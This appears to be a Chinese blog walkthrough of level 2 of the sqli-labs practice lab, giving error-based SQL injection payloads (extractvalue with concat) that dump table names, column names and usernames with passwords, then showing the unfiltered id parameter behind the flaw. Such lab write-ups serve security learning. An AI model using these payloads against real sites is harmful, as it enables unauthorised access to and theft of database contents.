首页 > 数据库技术 > 详细

sqli-labs

时间:2020-02-22 22:30:23      阅读:61      评论:0      收藏:0      [点我收藏+]

来到第第二关

技术分享图片

 

 首先在后面添加一个 单引号看下报错信息

技术分享图片

 

 发现这里多多了一个引号  尝试去掉单引号看下回显结果   :    and 1=2

技术分享图片

 

 可以发现这里不需要添加单引号进行闭合,可以直接控制,所以接下来采用报错注入方式进行”脱裤“

?id=-1 and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())))--+

技术分享图片

 

 下面获取字段名

-1 and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=‘users‘ and table_schema=database())))--+

技术分享图片

 

 获取字段内容

?id=-1 and extractvalue(1,concat(0x7e,(select group_concat(id,0x3a,username,0x7e,password)from users)))--+技术分享图片

 

 下两个字段内容

/?id=-1 and extractvalue(1,concat(0x7e,(select group_concat(id,0x3a,username,0x7e,password) from users where username not in(‘Dumb‘,‘Angelina‘))))--+技术分享图片

 

 同理可继续爆出其他数据,这就不继续测试了,看下产生漏洞的地方   id  

技术分享图片

 

 可以很明显的看到id得到的值没有做限制就直接进去到数据库中进行查询语句。

-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ending

sqli-labs

原文:https://www.cnblogs.com/zi-Chuan/p/12347322.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!